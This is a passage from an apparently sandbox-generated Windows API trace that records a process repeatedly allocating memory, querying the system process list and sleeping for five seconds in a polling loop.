BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.768] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 